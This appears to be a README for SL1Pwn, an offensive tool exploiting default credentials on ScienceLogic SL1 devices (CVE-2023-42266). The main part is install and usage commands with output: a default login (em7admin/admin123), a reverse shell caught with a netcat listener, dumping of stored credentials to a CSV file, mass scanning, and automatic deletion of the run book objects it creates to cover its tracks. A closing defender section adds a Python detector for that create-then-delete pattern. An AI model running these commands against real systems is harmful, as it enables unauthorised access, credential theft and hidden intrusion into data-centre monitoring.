This tool uses default credentials to obtain a reverse shell, dump credentials, and log in via HTTP and SSH (single or bulk) on ScienceLogic SL1 devices. If the default credentials are not correct, you can supply your own.
Recognized as CVE-2023-42266.
Hacking the Heartbeat Monitor of a Data Center - ScienceLogic SL1

git clone https://github.com/3NailsInfoSec/SL1Pwn.git
cd SL1Pwn
pip3 install -r requirements.txt

python3 sl1pwn.py -t 1.1.1.1
[+] UI Login Success! https://1.1.1.1:443
[+] API Login Success! https://1.1.1.1:443

python3 sl1pwn.py -t 1.1.1.1 -p 22 -user em7admin -pass admin123
[+] Possible SSH success 1.1.1.1:22

python3 sl1pwn.py -t 1.1.1.1 -shell -L 2.2.2.2 -P 4444
[+] UI Login Success! https://1.1.1.1:443
[+] API Login Success! https://1.1.1.1:443
[*] Created action with name: kjsKKe
[*] Created schedule successfully: 25
[*] Created automation successfully: 115
[+] Run book executed! Press enter when ready to clean up...
[*] Deleted action[121]: kjsKKe
[*] Deleted schedule[25]: kjsKKe
[*] Deleted automation[115]: kjsKKe

# nc -lvp 4444
Connection received on 1.1.1.1 45352
sh-4.2$

python3 sl1pwn.py -t 1.1.1.1 -dump -o target_creds.csv
[*] Dumping 1.1.1.1::22 stored api credentials
[LifeSize: Endpoint SNMP]
[Cisco: CSP SNMP Port 161 Example]
[Cisco: CSP SNMP Port 1610 Exampl]
[Dell EMC: Isilon SNMPv2 Example]
[Cisco SNMPv3 - Example]
[Cisco SNMPv2 - Example]
[*] Saved to target_creds.csv

python3 sl1pwn.py -scan targets.txt -threads 25
[+] UI Login Success! https://1.1.1.1:443
[+] API Login Success! https://1.1.1.1:443
[+] UI Login Success! https://1.1.1.2:443
[+] API Login Success! https://1.1.1.2:443
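
For defenders: the -shell run above creates an action, a schedule and an automation under one random name, then deletes all three during cleanup. The added example below (not part of SL1Pwn) flags that create-then-delete pattern in audit events. The key=value log format, the timestamps, the `ops1` user and the `RestartApache` entry are constructed assumptions, not SL1's real audit log layout.

```python
from datetime import datetime, timedelta

# Constructed sample events in a hypothetical key=value format (NOT SL1's real
# audit log layout). The kjsKKe name and ids mirror the tool output above.
SAMPLE_LOG = """\
2023-09-01T10:00:01 user=em7admin op=create type=action id=121 name=kjsKKe
2023-09-01T10:00:02 user=em7admin op=create type=schedule id=25 name=kjsKKe
2023-09-01T10:00:03 user=em7admin op=create type=automation id=115 name=kjsKKe
2023-09-01T10:04:40 user=em7admin op=delete type=action id=121 name=kjsKKe
2023-09-01T10:04:41 user=em7admin op=delete type=schedule id=25 name=kjsKKe
2023-09-01T10:04:41 user=em7admin op=delete type=automation id=115 name=kjsKKe
2023-09-01T11:00:00 user=ops1 op=create type=action id=122 name=RestartApache
2023-09-01T11:00:05 user=ops1 op=create type=automation id=116 name=RestartApache
"""

# All three object types must be created and later deleted under one name.
REQUIRED = {"action", "schedule", "automation"}

def parse(line):
    """Split 'TIMESTAMP k=v k=v ...' into a dict with a parsed 'ts' field."""
    ts, *pairs = line.split()
    event = dict(p.split("=", 1) for p in pairs)
    event["ts"] = datetime.fromisoformat(ts)
    return event

def find_ephemeral_runbooks(log_text, window=timedelta(minutes=15)):
    """Return names whose action/schedule/automation lived no longer than window."""
    by_name = {}
    for line in log_text.splitlines():
        if line.strip():
            event = parse(line)
            by_name.setdefault(event["name"], []).append(event)
    findings = []
    for name, events in by_name.items():
        created = {e["type"]: e["ts"] for e in events if e["op"] == "create"}
        deleted = {e["type"]: e["ts"] for e in events if e["op"] == "delete"}
        if not (REQUIRED.issubset(created) and REQUIRED.issubset(deleted)):
            continue  # long-lived or partial run books are not flagged
        lifetime = max(deleted.values()) - min(created.values())
        if timedelta(0) <= lifetime <= window:
            findings.append({"name": name,
                             "users": sorted({e["user"] for e in events}),
                             "lifetime_s": int(lifetime.total_seconds())})
    return findings

if __name__ == "__main__":
    for finding in find_ephemeral_runbooks(SAMPLE_LOG):
        print(finding)
```
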